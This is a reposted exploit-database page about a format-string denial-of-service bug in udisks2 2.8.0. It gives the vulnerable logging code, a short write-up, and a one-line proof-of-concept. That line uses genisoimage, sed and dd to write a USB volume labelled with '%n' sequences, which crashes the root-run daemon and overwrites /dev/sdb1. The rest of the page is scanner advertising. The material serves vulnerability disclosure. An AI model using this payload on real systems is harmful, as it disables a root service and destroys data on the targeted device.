udisks2 2.8.0 denial of service (poc)

▸▸▸ Exploit & Vulnerability >>   dos exploit & linux vulnerability




udisks2 2.8.0 denial of service (poc) Code Code...
				
# Exploit: udisks2 2.8.0 - Denial of Service (PoC) # Author: oxagast # Date: 2018-09-22 # Vendor Homepage: http://storaged.org/ # Software Link: https://github.com/storaged-project/udisks # Version: <=udisks2 2.8.0 # Tested on: Ubuntu x64 __ _ _ __ ___ __ ____ ____ / ( \/ )/ _\ / __)/ _\/ ___(_ _) ( O ) (/ ( (_ / \___ \ )( \__(_/\_\_/\_/\___\_/\_(____/(__) # ========The vulnerable section of code is:======== #if GLIB_CHECK_VERSION(2, 50, 0) g_log_structured ("udisks", (GLogLevelFlags) level, "MESSAGE", message, "THREAD_ID", "%d", (gint) syscall (SYS_gettid), "CODE_FUNC", function, "CODE_FILE", location); #else g_log ("udisks", level, "[%d]: %s [%s, %s()]", (gint) syscall (SYS_gettid), message, location, function); # =================Short Whitepaper================= # The vulnerability can be triggered by using one computer to create a filesystem on a USB key # (or other removable media), then editing it's filesystem label to include a bunch of %n's, removing and # inserting the media into another computer running udisks2 <=2.8.0. This binary runs as root, and if # exploited in that capacity could potentially allow full compromise. This will cause a denial of service, # crashing udisks2 and not letting it restart (or until /var/lib/udisks2/mounted-fs is # removed and the system is restarted). This keeps the system from automounting things like USB drives and CDs. # The vulnerability -may- be exploitable beyond a DoS by crafting a format string exploit and putting it # in the label of the drive. I tried to exploit it for a couple days, but cannot find a filesystem with a # lengthy enough label to be able to fit the exploit and spawn a root shell, as the smallest shellcode I # could make was around 50 characters, and the longest filesystem labels I could find are limited to 32 characters. # =============Proof of Concept Code================ # This code will destroy any information on /dev/sdb1!!!! Change that to where you have your USB media. # PoC source code: genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1 # Now remove and reinsert the media and wait for the crash report.

Udisks2 2.8.0 denial of service (poc) Vulnerability / Exploit Source : Udisks2 2.8.0 denial of service (poc)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.